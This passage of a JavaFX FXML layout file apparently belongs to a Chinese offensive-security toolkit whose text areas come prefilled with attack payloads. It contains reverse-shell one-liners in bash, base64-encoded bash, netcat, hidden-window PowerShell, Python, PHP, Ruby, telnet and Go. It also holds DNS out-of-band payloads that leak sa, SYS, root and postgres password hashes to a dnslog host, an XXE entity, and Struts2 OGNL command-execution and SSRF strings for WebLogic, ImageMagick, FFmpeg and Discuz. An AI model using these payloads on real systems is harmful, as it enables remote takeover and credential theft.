</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets left="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<ScrollPane>
|
||
<content>
|
||
<VBox prefHeight="602.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane text="Bash -i" textFill="#c22138">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea1" prefHeight="0.0" prefWidth="966.0" promptText="bash -i >& /dev/tcp/127.0.0.1/8080 0>&1" text="bash -i >& /dev/tcp/127.0.0.1/8080 0>&1">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Bash Base64">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea2" prefHeight="0.0" prefWidth="966.0" promptText="bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}'" text="bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}'">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
</HBox>
|
||
</content>
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="0.9806763285024155" startX="0.9420289855072463" startY="0.27053140096618356">
|
||
<stops>
|
||
<Stop color="#b90808" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="nc -e" textFill="#d12e1b">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea3" prefHeight="0.0" prefWidth="966.0" promptText="nc -e cmd 127.0.0.1 8080" text="nc -e cmd 127.0.0.1 8080">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Powershell -1" textFill="#d71d1d">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea4" prefHeight="0.0" prefWidth="966.0" promptText="powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" text="powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Powershell -2" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea5" prefHeight="0.0" prefWidth="966.0" promptText="powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"" text="powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Powershell -3" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea6" prefHeight="0.0" prefWidth="966.0" promptText="powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 8080);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"" text="powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 8080);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Python -1" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea7" prefHeight="0.0" prefWidth="966.0" promptText="export RHOST="127.0.0.1";export RPORT=8080;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("cmd")'" text="export RHOST="127.0.0.1";export RPORT=8080;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("cmd")'">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Python -2" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea8" prefHeight="0.0" prefWidth="966.0" promptText="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("cmd")'" text="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("cmd")'">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="exec" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea9" prefHeight="0.0" prefWidth="966.0" promptText="sh -i >& /dev/tcp/10.10.10.10/9001 0>&exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5|while read line;do $line >&5 2>&1;done" text="exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5|while read line;do $line >&5 2>&1;done">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="PHP" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea10" prefHeight="0.0" prefWidth="966.0" promptText="php -r '$sock=fsockopen("127.0.0.1",8080);exec("cmd <&3 >&3 2>&3");'" text="php -r '$sock=fsockopen("127.0.0.1",8080);exec("cmd <&3 >&3 2>&3");'">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Ruby" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea11" prefHeight="0.0" prefWidth="966.0" promptText="ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("127.0.0.1",8080))'" text="ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("127.0.0.1",8080))'">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Telnet" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea12" prefHeight="0.0" prefWidth="966.0" promptText="TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 8080 0<$TF | cmd 1>$TF" text="TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 8080 0<$TF | cmd 1>$TF">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="Golang" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="acTextArea13" prefHeight="0.0" prefWidth="966.0" promptText="echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:8080");cmd:=exec.Command("cmd");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go" text="echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:8080");cmd:=exec.Command("cmd");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
<TitledPane expanded="false" text="更多" textFill="#dd1111">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<TextArea prefHeight="0.0" prefWidth="966.0" promptText="https://www.revshells.com/" text="https://www.revshells.com/">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</ScrollPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="字典生成">
|
||
<content>
|
||
<VBox>
|
||
<children>
|
||
<Button fx:id="adBtn" mnemonicParsing="false" onAction="#adBtn" prefHeight="29.0" prefWidth="991.0" style="-fx-background-color: #DAFFFB;" text="如果失败请点我" textFill="RED" />
|
||
<WebView fx:id="adWebView" prefHeight="638.0" prefWidth="990.0" />
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="杀软识别">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TextArea fx:id="aeTextArea1" prefHeight="627.0" prefWidth="475.0" promptText="tasklist /svc">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<Button fx:id="aeBtn" mnemonicParsing="false" onAction="#aeBtn" prefHeight="59.0" prefWidth="490.0" style="-fx-background-color: #FF9B9B;" text="识别" textFill="WHITE" />
|
||
<TextArea fx:id="aeTextArea2" prefHeight="597.0" prefWidth="475.0">
|
||
<VBox.margin>
|
||
<Insets left="10.0" right="10.0" top="10.0" />
|
||
</VBox.margin>
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</VBox>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="DNSLOG">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<VBox>
|
||
<VBox.margin>
|
||
<Insets left="10.0" />
|
||
</VBox.margin>
|
||
<children>
|
||
<HBox prefHeight="40.0" prefWidth="988.0" spacing="8.0">
|
||
<children>
|
||
<Label text="dnslog地址" textFill="#eb0000">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="afTextField" prefHeight="29.0" prefWidth="293.0" promptText="0x421.dnslog.pw" text="0x421.dnslog.pw">
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="afBtn" mnemonicParsing="false" onAction="#afBtn" prefHeight="25.0" prefWidth="128.0" text="点击生成" textFill="RED">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<graphic>
|
||
<VBox />
|
||
</graphic>
|
||
<HBox.margin>
|
||
<Insets top="6.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="命令执行场景">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea fx:id="afTextArea1" prefHeight="546.0" prefWidth="970.0" promptText="Liunx/Unix/Mac OS系统: curl http://0x421.dnslog.pw/`whoami` ping `whoami`.0x421.dnslog.pw Windows系统: ping %USERNAME%.0x421.dnslog.pw" text="Liunx/Unix/Mac OS系统: curl http://0x421.dnslog.pw/`whoami` ping `whoami`.0x421.dnslog.pw Windows系统: ping %USERNAME%.0x421.dnslog.pw">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="SQL注入场景">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea fx:id="afTextArea2" prefHeight="546.0" prefWidth="970.0" promptText="SQL Server数据库: DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') +'.0x421.dnslog.pw'; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); Oracle数据库: SELECT UTL_INADDR.GET_HOST_ADDRESS('0x421.dnslog.pw'); SELECT UTL_HTTP.REQUEST('http://0x421.dnslog.pw/oracle') FROM DUAL; SELECT HTTPURITYPE('http://0x421.dnslog.pw/oracle').GETCLOB() FROM DUAL; SELECT DBMS_LDAP.INIT(('oracle.0x421.dnslog.pw',80) FROM DUAL; SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.0x421.dnslog.pw',80) FROM DUAL; MySQL数据库: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.0x421.dnslog.pw\\abc')); PostgreSQL数据库: DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $ DECLARE exec_cmd TEXT; DECLARE query_result TEXT; BEGIN SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres'); exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.psql.0x421.dnslog.pw\\\\foobar.txt\''; EXECUTE exec_cmd; END; $ LANGUAGE plpgsql SECURITY DEFINER; SELECT temp_function();" text="SQL Server数据库: DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') +'.0x421.dnslog.pw'; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); Oracle数据库: SELECT UTL_INADDR.GET_HOST_ADDRESS('0x421.dnslog.pw'); SELECT UTL_HTTP.REQUEST('http://0x421.dnslog.pw/oracle') FROM DUAL; SELECT HTTPURITYPE('http://0x421.dnslog.pw/oracle').GETCLOB() FROM DUAL; SELECT DBMS_LDAP.INIT(('oracle.0x421.dnslog.pw',80) FROM DUAL; SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.0x421.dnslog.pw',80) FROM DUAL; MySQL数据库: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.0x421.dnslog.pw\\abc')); PostgreSQL数据库: DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $ DECLARE exec_cmd TEXT; DECLARE query_result TEXT; BEGIN SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres'); exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.psql.0x421.dnslog.pw\\\\foobar.txt\''; EXECUTE exec_cmd; END; $ LANGUAGE plpgsql SECURITY DEFINER; SELECT temp_function();">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="XXE场景">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea fx:id="afTextArea3" prefHeight="546.0" prefWidth="970.0" promptText="XML实体: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://0x421.dnslog.pw/xxe_test"> %remote;]> <root/>" text="XML实体: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://0x421.dnslog.pw/xxe_test"> %remote;]> <root/>">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="其他场景">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea fx:id="afTextArea4" prefHeight="546.0" prefWidth="970.0" promptText="Struts2中间件: xx.action?redirect:http://0x421.dnslog.pw/%25{3*4} xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://0x421.dnslog.pw/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} FFMpeg插件: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://0x421.dnslog.pw #EXT-X-ENDLIST Weblogic中间件: example.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://0x421.dnslog.pw/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search ImageMagick插件: push graphic-context viewbox 0 0 640 480 fill 'url(http://0x421.dnslog.pw)' pop graphic-context Resin中间件: example.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://0x421.dnslog.pw/ssrf Discuz社群: example.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://0x421.dnslog.pw/x.jpg[/img]&formhash=x" text="Struts2中间件: xx.action?redirect:http://0x421.dnslog.pw/%25{3*4} xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://0x421.dnslog.pw/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} FFMpeg插件: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://0x421.dnslog.pw #EXT-X-ENDLIST Weblogic中间件: example.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://0x421.dnslog.pw/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search ImageMagick插件: push graphic-context viewbox 0 0 640 480 fill 'url(http://0x421.dnslog.pw)' pop graphic-context Resin中间件: example.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://0x421.dnslog.pw/ssrf Discuz社群: example.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://0x421.dnslog.pw/x.jpg[/img]&formhash=x">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children></VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="空间测绘">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="Fofa">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox>
|
||
<children>
|
||
<Label fx:id="proxyStatusLabel11" contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="121.0" text=" 查询条件" textFill="#1cad5b">
|
||
<padding>
|
||
<Insets left="3.0" top="3.0" />
|
||
</padding>
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets left="11.0" top="3.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="baTextField" prefHeight="29.0" prefWidth="755.0" />
|
||
<Button fx:id="baBtn" mnemonicParsing="false" onAction="#baBtn" prefHeight="29.0" prefWidth="108.0" text="点击查询" />
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="baTextArea" prefHeight="729.0" prefWidth="909.0" text=" title="abc" 从标题中搜索abc。例:标题中有北京的网站。 header="abc" 从http头中搜索abc。例:jboss服务器。 body="abc" 从html正文中搜索abc。例:正文包含Hacked by。 domain="qq.com" 搜索根域名带有qq.com的网站。例: 根域名是qq.com的网站。 host=".gov.cn" 从url中搜索.gov.cn,注意搜索要用host作为名称。 port="443" 查找对应443端口的资产。例: 查找对应443端口的资产。 ip="1.1.1.1" 从ip中搜索包含1.1.1.1的网站,注意搜索要用ip作为名称。 protocol="https" 搜索制定协议类型(在开启端口扫描的情况下有效)。例: 查询https协议资产。 city="Beijing" 搜索指定城市的资产。例: 搜索指定城市的资产。 region="Zhejiang" 搜索指定行政区的资产。例: 搜索指定行政区的资产。 country="CN" 搜索指定国家(编码)的资产。例: 搜索指定国家(编码)的资产。 cert="google.com" 搜索证书(https或者imaps等)中带有google.com的资产。 高级搜索: title="powered by" && title!=discuz title!="powered by" && body=discuz ( body="content=\"WordPress" || (header="X-Pingback" && header="/xmlrpc.php" && body="/wp-includes/“) ) " />
|
||
<Button fx:id="baPOCBtn" mnemonicParsing="false" onAction="#baPOCBtn" prefHeight="900.0" prefWidth="83.0" style="-fx-background-color: #008000;" text="漏 洞 检 测" textFill="WHITE">
|
||
<font>
|
||
<Font size="20.0" />
|
||
</font>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="鹰图">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox>
|
||
<children>
|
||
<Label fx:id="proxyStatusLabel111" contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="121.0" text=" APIKey" textFill="#1cad5b">
|
||
<padding>
|
||
<Insets left="3.0" top="3.0" />
|
||
</padding>
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets left="11.0" top="3.0" />
|
||
</HBox.margin>
|
